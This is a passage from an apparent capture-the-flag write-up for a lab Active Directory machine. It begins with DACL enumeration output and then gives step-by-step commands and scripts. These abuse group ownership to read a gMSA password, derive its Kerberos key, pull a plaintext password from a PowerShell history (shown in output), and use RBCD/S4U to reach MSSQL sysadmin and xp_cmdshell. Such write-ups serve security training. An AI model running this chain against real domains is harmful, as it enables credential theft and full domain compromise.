DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : General-Information (59ba2f42-79a2-11d0-9020-00c04fc2d3cf)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : inetOrgPerson (4828cc14-1437-45bc-9b07-ad6f015e5f28)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[14] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : General-Information (59ba2f42-79a2-11d0-9020-00c04fc2d3cf)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[15] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : RAS-Information (037088f8-0ae1-11d2-b422-00a0c968f939)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : inetOrgPerson (4828cc14-1437-45bc-9b07-ad6f015e5f28)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[16] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : RAS-Information (037088f8-0ae1-11d2-b422-00a0c968f939)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[17] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty, WriteProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : ms-DS-Key-Credential-Link (5b47d60f-6090-40b2-9f37-2a4de88f3063)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Key Admins (S-1-5-21-2410575906-3092493790-2123333151-526)
DACLREAD    dc2.pong.htb    389    DC2              ACE[18] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty, WriteProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : ms-DS-Key-Credential-Link (5b47d60f-6090-40b2-9f37-2a4de88f3063)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Enterprise Key Admins (S-1-5-21-2410575906-3092493790-2123333151-527)
DACLREAD    dc2.pong.htb    389    DC2              ACE[19] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : Self
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : DS-Validated-Write-Computer (9b026da6-0d3c-465c-8bee-5199d7165cba)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : Computer (bf967a86-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Creator Owner (S-1-3-0)
DACLREAD    dc2.pong.htb    389    DC2              ACE[20] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : Self
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : DS-Validated-Write-Computer (9b026da6-0d3c-465c-8bee-5199d7165cba)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : Computer (bf967a86-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Principal Self (S-1-5-10)
DACLREAD    dc2.pong.htb    389    DC2              ACE[21] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : Token-Groups (b7c69e6d-2cc7-11d2-854e-00a0c983f608)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : Computer (bf967a86-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Enterprise Domain Controllers (S-1-5-9)
DACLREAD    dc2.pong.htb    389    DC2              ACE[22] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : Token-Groups (b7c69e6d-2cc7-11d2-854e-00a0c983f608)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : Group (bf967a9c-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Enterprise Domain Controllers (S-1-5-9)
DACLREAD    dc2.pong.htb    389    DC2              ACE[23] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : Token-Groups (b7c69e6d-2cc7-11d2-854e-00a0c983f608)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Enterprise Domain Controllers (S-1-5-9)
DACLREAD    dc2.pong.htb    389    DC2              ACE[24] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : WriteProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : ms-TPM-Tpm-Information-For-Computer (ea1b7b93-5e48-46d5-bc6c-4df4fda78a35)
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : Computer (bf967a86-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Principal Self (S-1-5-10)
DACLREAD    dc2.pong.htb    389    DC2              ACE[25] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : inetOrgPerson (4828cc14-1437-45bc-9b07-ad6f015e5f28)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[26] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : Group (bf967a9c-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[27] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_INHERITED_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Inherited type (GUID)     : User (bf967aba-0de6-11d0-a285-00aa003049e2)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[28] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadProperty, WriteProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity (3f78c3e5-f79a-46bd-a0b8-9d18116ddc79)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Principal Self (S-1-5-10)
DACLREAD    dc2.pong.htb    389    DC2              ACE[29] info
DACLREAD    dc2.pong.htb    389    DC2                  ACE Type                  : ACCESS_ALLOWED_OBJECT_ACE
DACLREAD    dc2.pong.htb    389    DC2                  ACE flags                 : CONTAINER_INHERIT_ACE, INHERITED_ACE
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ControlAccess, ReadProperty, WriteProperty
DACLREAD    dc2.pong.htb    389    DC2                  Flags                     : ACE_OBJECT_TYPE_PRESENT
DACLREAD    dc2.pong.htb    389    DC2                  Object type (GUID)        : Private-Information (91e647de-d96f-4b70-9557-d63ff4f3ccd8)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Principal Self (S-1-5-10)
DACLREAD    dc2.pong.htb    389    DC2              ACE[30] info
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : FullControl, Modify, ReadAndExecute, ReadAndWrite, Read, Write, WriteDACL, Delete, ListObject, WriteProperties, Self, CreateChild (0xf01ff)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Enterprise Admins (S-1-5-21-2410575906-3092493790-2123333151-519)
DACLREAD    dc2.pong.htb    389    DC2              ACE[31] info
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ListChildObjects (0x4)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : BUILTIN\Pre-Windows 2000 Compatible Access (S-1-5-32-554)
DACLREAD    dc2.pong.htb    389    DC2              ACE[32] info
DACLREAD    dc2.pong.htb    389    DC2                  Access mask               : ReadAndExecute, Read, Write, WriteOwner, Delete, ListChildObjects (0xf01bd)
DACLREAD    dc2.pong.htb    389    DC2                  Trustee (SID)             : Administrators (S-1-5-32-544)

So the privilege chain is:

%%{init: {'flowchart': {'htmlLabels': true}}}%% flowchart TD A["<span style='display:inline-block;min-width:240px;line-height:1.35;padding:2px 0 6px 0'>c.roberts in PING\\IT</span>"] B["<span style='display:inline-block;min-width:240px;line-height:1.35;padding:2px 0 6px 0'>PING\\IT owns<br/>PONG\\gMSA Managers</span>"] C["<span style='display:inline-block;min-width:240px;line-height:1.35;padding:2px 0 6px 0'>WriteDACL on gMSA Managers</span>"] D["<span style='display:inline-block;min-width:240px;line-height:1.35;padding:2px 0 6px 0'>Grant GenericAll</span>"] E["<span style='display:inline-block;min-width:240px;line-height:1.35;padding:2px 0 6px 0'>Add c.roberts as Member/FSP</span>"] F["<span style='display:inline-block;min-width:240px;line-height:1.35;padding:2px 0 6px 0'>ReadGMSAPassword<br/>Pong_gMSA$</span>"] A --> B --> C --> D --> E --> F style A fill:#1e3a5f,color:#fff,stroke:#4a90d9 style B fill:#1e3a5f,color:#fff,stroke:#4a90d9 style C fill:#2a4a2a,color:#fff,stroke:#5a9a5a style D fill:#2a4a2a,color:#fff,stroke:#5a9a5a style E fill:#4a3a1e,color:#fff,stroke:#d4a030 style F fill:#7a1f1f,color:#fff,stroke:#e05252

The Group Scope Problem

There are two AD restrictions that block naive exploitation:

  1. Global groups (groupType = -2147483646) cannot contain Foreign Security Principals (FSPs). FSPs are objects representing users from a trusted external domain. Attempting to add a cross-domain SID to a Global group returns ERROR_DS_NO_FPO_IN_UNIVERSAL_GROUPS.

  2. Universal groups (groupType = -2147483640) can hold FSPs, but also raise ERROR_DS_NO_FPO_IN_UNIVERSAL_GROUPS (confusingly - the error text is wrong, Universal CAN hold FSPs in most AD configurations, but see note below).

  3. Domain Local groups (groupType = -2147483644) can hold FSPs from trusted domains - this is the correct scope.

The fix: convert gMSA Managers from Global → Universal → DomainLocal, then add the FSP.

Full Exploitation Sequence

All commands run from Kali through the proxychains SOCKS tunnel using the PING c.roberts TGT.

Install bloodyAD in venv first:

source ~/venv/bin/activate
pip install bloodyAD

Step 1 - Grant ourselves GenericAll on gMSA Managers (using implicit owner rights):

proxychains ~/venv/bin/bloodyAD \
  --host dc2.pong.htb -d pong.htb -k --dc-ip 192.168.2.2 \
  add genericAll \
  'CN=gMSA Managers,CN=Users,DC=pong,DC=htb' \
  'S-1-5-21-<PING-DOMAIN-SID>-2617'

Replace S-1-5-21-<PING-DOMAIN-SID>-2617 with c.roberts’s SID (RID 2617 in the PING domain). Get it with:

# In Evil-WinRM on DC1
(Get-ADUser c.roberts).SID.Value

Step 2 - Convert Global → Universal:

proxychains ~/venv/bin/bloodyAD \
  --host dc2.pong.htb -d pong.htb -k --dc-ip 192.168.2.2 \
  set object 'CN=gMSA Managers,CN=Users,DC=pong,DC=htb' \
  groupType -v -2147483640

Step 3 - Convert Universal → DomainLocal (required to accept FSPs):

proxychains ~/venv/bin/bloodyAD \
  --host dc2.pong.htb -d pong.htb -k --dc-ip 192.168.2.2 \
  set object 'CN=gMSA Managers,CN=Users,DC=pong,DC=htb' \
  groupType -v -2147483644

Step 4 - Add c.roberts as a Foreign Security Principal member:

proxychains ~/venv/bin/bloodyAD \
  --host dc2.pong.htb -d pong.htb -k --dc-ip 192.168.2.2 \
  add groupMember 'gMSA Managers' \
  'S-1-5-21-<PING-DOMAIN-SID>-2617'

the-exploitation-path-image

⚠️ Critical: After adding yourself to the group, re-mint your TGT. The TGS for ldap/dc2.pong.htb in your current cache is bound to the old PAC (which does not include gMSA Managers). The KDC uses the PAC at TGS-issuance time, not at service access time.

certipy req -k -no-pass -ca ping-DC1-CA -template TemporaryWinRM \
  -target dc1.ping.htb -dc-ip 10.129.43.213 -dc-host dc1.ping.htb
certipy auth -pfx c.roberts.pfx -dc-ip 10.129.43.213
export KRB5CCNAME=$(pwd)/c.roberts.ccache

getting-hash

Step 5 - Read the gMSA password blob:

proxychains ~/venv/bin/bloodyAD \
  --host dc2.pong.htb -d pong.htb -k --dc-ip 192.168.2.2 \
  get object 'Pong_gMSA$' --attr msDS-ManagedPassword

the-b64-blob

bloodyAD outputs:

  • msDS-ManagedPassword.NT - NT hash of the gMSA password (usable for Pass-the-Hash)
  • msDS-ManagedPassword.B64ENCODED - raw 256-byte password material

Alternatively via nxc:

proxychains nxc ldap dc2.pong.htb -k --use-kcache --gmsa
# Should now show: Account: Pong_gMSA$  NTLM: <hash>

the-alternative

Deriving the AES256 Key (Required - RC4 is Disabled)

gMSAs often disable RC4 (msDS-SupportedEncryptionTypes = 28 = AES128 + AES256 only). The NT hash will not get you a TGT. You need the AES256 key derived from the raw password material.

gMSAs derive Kerberos keys the same way machine accounts do, using Kerberos string-to-key:

  • Password material: the 256 raw bytes decoded as UTF-16-LE, then re-encoded as UTF-8
  • Salt: <UPPER_REALM>host<lower_samaccountname_without_dollar>.<lower_dnshostname_suffix>

For Pong_gMSA$ where dnsHostName = pong_gmsa.pong.htb (check with Get-ADServiceAccount -Identity Pong_gMSA$ -Properties dnsHostName):

Salt = PONG.HTBhostpong_gmsa.pong.htb

⚠️ The salt is computed from dnsHostName, not sAMAccountName. Getting this wrong is the #1 cause of KDC_ERR_PREAUTH_FAILED when trying to use a gMSA key you derived. Verify the exact dnsHostName attribute before computing.

Derive the key:

from impacket.krb5.crypto import _AES256CTS
import base64

# blob is the B64ENCODED value from bloodyAD output
blob = base64.b64decode('<B64ENCODED_VALUE>')
pwd = blob.decode('utf-16-le', errors='replace').encode('utf-8')
salt = b'PONG.HTBhostpong_gmsa.pong.htb'
aes256 = _AES256CTS.string_to_key(pwd, salt, b'\x00\x00\x10\x00').contents.hex()
print(aes256)

Get a TGT:

proxychains impacket-getTGT pong.htb/Pong_gMSA$ \
  -aesKey <AES256_KEY> -dc-ip 192.168.2.2
mv Pong_gMSA$.ccache pong_gmsa.ccache
export KRB5CCNAME=$(pwd)/pong_gmsa.ccache

get-a-tgt


5. JEA Endpoint on DC1 → c.carlssen Credentials

Discovering the JEA Endpoint

From the c.roberts WinRM session on DC1, the Pong_gMSA$ user profile exists at C:\Users\Pong_gMSA$. The Documents folder contains JEA configuration files:

cat C:\Users\Pong_gMSA$\Documents\JEAconfig_backup.pssc
@{
    SchemaVersion    = '2.0.0.0'
    GUID             = '54906d16-7873-47d3-81f1-fc8d29748ecf'
    Author           = 'Pong\C.Carlssen'
    SessionType      = 'RestrictedRemoteServer'
    TranscriptDirectory = 'C:\ProgramData\JEAConfiguration\Transcripts'
    RunAsVirtualAccount = $true
    RoleDefinitions  = @{
        'Pong\C.Carlssen' = @{ 'RoleCapabilities' = 'ITAccess' }
    }
}
Get-PSSessionConfiguration | Select Name, Permission
Name         Permission
----         ----------
restricted   pong\Pong_gMSA$ AccessAllowed
microsoft... ...

The restricted PSSession configuration:

  • Is accessible only by Pong_gMSA$
  • Runs as a virtual admin account (RunAsVirtualAccount = $true) - this gives local SYSTEM-equivalent privileges for the duration of the session
  • Uses the ITAccess role capability which exposes only a small set of cmdlets (Get-Service, Get-EventLog, networking tools)
  • Has LanguageMode = NoLanguage - no arbitrary PowerShell

Connecting as Pong_gMSA$ to the JEA Endpoint

From Kali, using pypsrp (Python WinRM library that handles Kerberos):

pip install pypsrp
from pypsrp.wsman import WSMan
from pypsrp.powershell import PowerShell, RunspacePool

wsman = WSMan(
    'dc1.ping.htb',
    port=5985,
    auth='kerberos',
    encryption='always',
    cert_validation=False
)

with RunspacePool(wsman, configuration_name='restricted') as pool:
    ps = PowerShell(pool)
    ps.add_script(
        'Get-Content "C:\\Users\\Pong_gMSA$\\AppData\\Roaming\\Microsoft\\'
        'Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt"'
    )
    output = ps.invoke()
    for line in output:
        print(line)

🔑 Why pypsrp instead of Evil-WinRM? Evil-WinRM does not support connecting to named PSSession configurations (-ConfigurationName). It always connects to the default endpoint. pypsrp allows specifying configuration_name='restricted'.

🔑 The RunAsVirtualAccount key: even though the JEA role only exposes network/service cmdlets, the session runs as a virtual local admin. This means the process has local admin rights even if the exposed commands are restricted. The PSReadLine history file of Pong_gMSA$ is readable by the session.

Finding c.carlssen’s Password

The PSReadLine history file at

C:\Users\Pong_gMSA$\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt```
 contains a one-liner left by an administrator:

```powershell
$cred = New-Object PSCredential('pong\c.carlssen', (ConvertTo-SecureString '<REDACTED>' -AsPlainText -Force))

Verify and Get TGT

proxychains impacket-getTGT pong.htb/c.carlssen:'<PASSWORD>' -dc-ip 192.168.2.2
mv c.carlssen.ccache carlssen.ccache
export KRB5CCNAME=$(pwd)/carlssen.ccache

WinRM to DC2

proxychains evil-winrm -i 192.168.2.2 -r PONG.HTB

results

(venv) ┌─[havoc@havocsec]─[~/Downloads/htb/season10/pingpong]
└──╼ $proxychains impacket-getTGT pong.htb/c.carlssen:'A()DUJ!@414' -dc-ip 192.168.2.2
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.2.2:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.2.2:88  ...  OK
[*] Saving ticket in c.carlssen.ccache
(venv) ┌─[havoc@havocsec]─[~/Downloads/htb/season10/pingpong]
└──╼ $mv c.carlssen.ccache carlssen.ccache
export KRB5CCNAME=$(pwd)/carlssen.ccache
(venv) ┌─[havoc@havocsec]─[~/Downloads/htb/season10/pingpong]
└──╼ $proxychains evil-winrm -i 192.168.2.2 -r PONG.HTB
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.9

                                        
Warning: IP address detected (192.168.2.2). Kerberos requires FQDN. Do you want to attempt reverse DNS lookup?
                                        
Warning: Press "y" to attempt DNS resolution, press any other key to cancel

                                        
Info: Attempting reverse DNS lookup to get FQDN for Kerberos...
                                        
Info: Found FQDN(s) in /etc/hosts: DC2.pong.htb, pong.htb, dc2.pong.htb
                                        
Info: Multiple DNS names found: DC2.pong.htb, pong.htb, dc2.pong.htb. Selected: DC2.pong.htb
                                        
[+] Resolved IP 192.168.2.2 to FQDN: DC2.pong.htb
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.2.2:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.2.2:5985  ...  OK
*Evil-WinRM* PS C:\Users\C.Carlssen\Documents> whoami
pong\c.carlssen
*Evil-WinRM* PS C:\Users\C.Carlssen\Documents> 

When Evil-WinRM prompts about reverse DNS (because you used an IP), press y - it resolves to dc2.pong.htb from /etc/hosts and uses that as the Kerberos SPN target.

shell

type C:\Users\C.Carlssen\Desktop\user.txt
# → <REDACTED USER FLAG>

🏁 user.txt obtained


6. RBCD on svc_sql + S4U → MSSQL Sysadmin

Enumerating c.carlssen’s Rights

BloodHound / manual LDAP enumeration shows:

  • c.carlssen is in IT Service Admins group in pong.htb
  • IT Service Admins has GenericWrite on CN=svc_sql,OU=Service Accounts,DC=pong,DC=htb
  • svc_sql has SPN mssqlsvc/dc2.pong.htb - MSSQL is running on DC2

GenericWrite on a service account is sufficient for Resource-Based Constrained Delegation (RBCD).

What RBCD Is

RBCD allows a principal to obtain a service ticket to a target service on behalf of any user (including privileged ones like domain admins). Unlike traditional constrained delegation (which is configured on the delegating account), RBCD is configured on the target service account via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

The attack:

  1. Write a security descriptor to svc_sql’s msDS-AllowedToActOnBehalfOfOtherIdentity naming a principal we control as allowed to delegate (Pong_gMSA$ - we own its keys)
  2. Use S4U2Self as Pong_gMSA$ to get a service ticket for ourselves to any SPN
  3. Use S4U2Proxy to convert it to a ticket for a privileged user (c.adam, who is an MSSQL sysadmin) to mssqlsvc/dc2.pong.htb

Setting RBCD

From a c.carlssen WinRM session on DC2 (ADSI is reliable here; bloodyAD has cross-realm quirks):

$gmsaSid = (Get-ADServiceAccount -Identity 'Pong_gMSA$' -Server dc2.pong.htb).SID.Value

$svc = New-Object System.DirectoryServices.DirectoryEntry(
    "LDAP://dc2.pong.htb/CN=svc_sql,OU=Service Accounts,DC=pong,DC=htb"
)

$sd = New-Object System.Security.AccessControl.RawSecurityDescriptor(
    "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$gmsaSid)"
)

$bytes = New-Object byte[] $sd.BinaryLength
$sd.GetBinaryForm($bytes, 0)

$svc.Properties['msDS-AllowedToActOnBehalfOfOtherIdentity'].Value = $bytes
$svc.CommitChanges()

Verify:

(Get-ADServiceAccount -Identity svc_sql -Server dc2.pong.htb `
  -Properties msDS-AllowedToActOnBehalfOfOtherIdentity `
  ).msDS-AllowedToActOnBehalfOfOtherIdentity
# Should output the raw byte array (non-empty)

S4U Impersonation

export KRB5CCNAME=$(pwd)/pong_gmsa.ccache

proxychains impacket-getST \
  -k -no-pass \
  -spn 'mssqlsvc/dc2.pong.htb' \
  -impersonate 'c.adam' \
  -dc-ip 192.168.2.2 \
  'pong.htb/Pong_gMSA$'

Output: c.adam@mssqlsvc_dc2.pong.htb@PONG.HTB.ccache

export KRB5CCNAME=$(pwd)/'c.adam@mssqlsvc_dc2.pong.htb@PONG.HTB.ccache'

Connect to MSSQL

proxychains impacket-mssqlclient \
  -k -no-pass \
  'pong.htb/c.adam@dc2.pong.htb' \
  -dc-ip 192.168.2.2

Verify sysadmin and enable xp_cmdshell:

SELECT IS_SRVROLEMEMBER('sysadmin');   -- returns 1
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;          RECONFIGURE;
EXEC xp_cmdshell 'whoami';             -- pong\svc_sql
EXEC xp_cmdshell 'whoami /priv';       -- SeImpersonatePrivilege   Enabled

svc_sql has SeImpersonatePrivilege - a potato attack vector.


mysql-database-acccess

7. GodPotato → DC2 Administrator

SeImpersonatePrivilege on a fully-patched Windows Server 2022 DC → GodPotato.

